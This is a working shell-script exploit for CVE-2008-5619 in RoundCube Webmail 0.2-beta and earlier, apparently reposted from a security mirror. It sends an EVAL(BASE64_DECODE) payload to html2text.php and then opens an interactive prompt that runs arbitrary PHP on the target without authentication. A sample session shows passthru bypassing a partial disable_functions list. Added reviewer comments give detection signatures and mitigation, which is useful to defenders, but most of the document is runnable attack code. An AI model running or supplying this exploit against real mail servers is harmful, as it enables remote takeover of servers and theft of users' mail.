RoundCube Webmail <= 0.2b Remote Code Execution Exploit
来源:rch2tex@hunger.hu 作者:Hunger 发布时间:2008-12-24  

#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
#
# --- Reviewer notes (defensive reading of this script) ---
#
# What it does: POSTs a small HTML snippet to RoundCube's html2text.php
# (CVE-2008-5619, described above as a preg_replace()/eval bug). The snippet
# carries no PHP statements of its own; it only makes the vulnerable eval
# BASE64_DECODE and EVAL the request's "Accept" header, and the script then
# re-sends new Accept values read from stdin as an interactive "PHP>" prompt.
# Note that the sample session above ran with disable_functions = exec,system
# and still got passthru() -- a partial function blacklist is not a
# mitigation for this bug.
#
# Detection / response:
#   * The observable artifacts are a POST to html2text.php whose body contains
#     "EVAL(BASE64_DECODE($_SERVER[HTTP_ACCEPT]))" and whose Accept header is a
#     base64 blob instead of a media-type list; both are visible in a proxy or
#     WAF log before PHP runs.
#   * A successful run's response body starts with the literal marker
#     "Succeeded! :))" (SPLOITCHK below); on a target the script considers
#     patched, the "{${EVAL(...)}}" text comes back unevaluated instead.
#   * Requests are plain HTTP/1.0 on port 80 with a fixed MSIE 7 User-Agent
#     and no Cookie header (the endpoint is reached unauthenticated).
#
# Mitigation: run a RoundCube release in which this is fixed (see the CVE
# link above) and/or restrict access to bin/html2text.php at the web server.
#
# Portability: the shebang says /bin/sh, but "echo -e"/"echo -ne", "let" and
# "base64 --wrap=0" are bash/GNU extensions. Under dash the "-e" is printed
# literally and RETURNCHR (below) would not be a bare CR, so the response
# checks would never match. Effectively this requires bash + GNU coreutils.

echo  'Exploit for Roundcube Webmail =< 0.2-beta'
echo  'html2text.php / preg_replace() / eval bug'
echo -e '\r\nby Hunger <rch2tex@hunger.hu>\r\n\n'

# Usage check. Only $2 (deeplink) is tested; an empty $1 (hostname) gets
# through here and only fails later at the netcat connect.
if [ "$2" = "" ]; then echo "
Usage:
$0 <hostname> <deeplink>

Example:
\$ $0 localhost /roundcube/bin/html2text.php


For https sites use stunnel or socat!
"; exit 1; fi

# Tool discovery. `which` is not POSIX; `command -v` is the portable form.
NETCATEXE=`which nc`
BASE64ENC=`which base64`

if [ "$NETCATEXE" = "" ] || [ "$BASE64ENC" = "" ];
then
   echo "Required tool(s) missing... (netcat, base64)"
   exit 2
fi

# Static User-Agent sent with every request (useful as a log-review fingerprint).
USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"

# The "HTML" that is POSTed. MYPAYLOAD is the text the vulnerable
# preg_replace()/eval interprets as PHP: decode the Accept request header and
# eval it. The PHP statements themselves therefore never appear in the body,
# only base64-encoded in the Accept header (see HTTP_SEND below).
MYPAYLOAD="{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}"
EVALEDTAG="<b>"
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG"</b>"

# Hard-coded Content-length. 54 is the byte length of EVALEDTAG as built
# above ("<b>" + 47-byte MYPAYLOAD + "</b>"); it is not recomputed.
PARAMSIZE=54

HOST_NAME=$1
DEEP_LINK=$2
# Plain HTTP on a fixed port; the usage text points at stunnel/socat for TLS.
HTTP_PORT=80

# Raw HTTP/1.0 request head, kept as a string with literal "\r\n" escapes;
# they only become CRLF when "echo -ne" sends it. The head deliberately ends
# in "Accept:" with no value -- the base64 PHP is appended there per request.
# No Cookie/session header is sent.
HTTPHEADR=""
HTTPHEADR=$HTTPHEADR"POST $DEEP_LINK HTTP/1.0\r\n"
HTTPHEADR=$HTTPHEADR"Host: $HOST_NAME\r\n"
HTTPHEADR=$HTTPHEADR"User-Agent: $USERAGENT\r\n"
HTTPHEADR=$HTTPHEADR"Content-length: $PARAMSIZE\r\n"
HTTPHEADR=$HTTPHEADR"Accept:"

# First PHP statement to send: an echo() of SPLOITCHK plus a short banner.
# The response parser below looks for SPLOITCHK as the first body line to
# decide whether the injected text was actually evaluated.
SPLOITCHK='Succeeded! :))'
PHPAYLOAD='echo("'
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK'\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Type PHP functions as shell commands. ;)\r\n'
PHPAYLOAD=$PHPAYLOAD'Use \"exit\" to close session.\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Good luck and have phun! ;D\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'")'

# Accepted status lines. RETURNCHR: command substitution strips the trailing
# newline, leaving a single CR. Lines read from the CRLF response keep their
# CR after "read" drops the LF, so they are compared against "...$RETURNCHR".
HTTPOKMSG="HTTP/1.0 200 OK"
HTTP1KMSG="HTTP/1.1 200 OK"
RETURNCHR=`echo -e "\r\n"`

echo -n "Trying to exploit... "

# Interactive loop: each pass sends one request whose Accept header is the
# base64 of "$PHPAYLOAD;", prints the response body, then reads the next
# statement from stdin. Only the literal "exit" ends the loop.
# f (outer shell) is 0 on the first request only; the patched/failed checks
# inside the parser run only on that first request.
# NOTE(review): on EOF of stdin, "read" leaves PHPAYLOAD empty and the loop
# keeps sending ";" -- looks like a tight loop rather than a clean stop.
f=0; until [ "$PHPAYLOAD" = "exit" ]; do
 PHPAYLOAD=`echo "$PHPAYLOAD;" |$BASE64ENC --wrap=0`
 HTTP_SEND="$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG"
 # $? after this line is netcat's status (last pipeline stage), not echo's.
 HTTP_BACK=`echo -ne "$HTTP_SEND"|$NETCATEXE $HOST_NAME $HTTP_PORT`
 if [ $? != 0 ]; then echo "Connection failed."; exit 3; fi
 # Response parser. The while runs in a pipeline subshell: changes to l/e/f
 # are local to it, and each "exit 4" below ends only the subshell -- the
 # outer shell sees it as the pipeline status ($? after "done").
 #   l = line counter (line 1 must be one of the 200 status lines)
 #   e = count of CR-only lines seen; e>0 means the header block has ended
 #   f = 0 on the first request only (see above)
 e=0; l=0; echo "$HTTP_BACK" | while read i; do let l++;
   if [ $l = 1 ] && [ "$i" != "$HTTPOKMSG$RETURNCHR" ] \
                 && [ "$i" != "$HTTP1KMSG$RETURNCHR" ]; then
      echo "Bad Server Response :\\"; exit 4; fi;
   # First body line equal to the raw MYPAYLOAD text is reported as "patched"
   # (the script takes an unevaluated echo-back as the fixed behaviour).
   if [ $e = 1 ] && [ $f = 0 ] && [ "$i" = "$MYPAYLOAD" ]; then
      echo "Target has been patched /o\\"; exit 4; fi
   # Otherwise the first body line must be SPLOITCHK, else "failed".
   if [ $e = 1 ] && [ $f = 0 ] && [ "$i" != "$SPLOITCHK$RETURNCHR" ]; then
      echo -e "Exploitation failed :(("; exit 4; elif
         [ "$i" = "$SPLOITCHK$RETURNCHR" ]; then let f++; fi
   # Body lines (everything after the header/body separator) are echoed.
   if [ $e -gt 0 ]; then echo "$i"; fi
   if [ "$i" = "$RETURNCHR" ]; then let e++; fi
 done
 # Pipeline status 4 means one of the parser's exits fired: dump the raw
 # response and stop. Otherwise mark the first request done (f++) and prompt.
 if [ $? != 4 ]; then let f++; echo -ne "PHP> "; else
  echo -e "\n\nDump:\n\n$HTTP_BACK"; exit 4; fi;
 # "read" without -r: backslashes in the typed statement are interpreted.
 read PHPAYLOAD
done

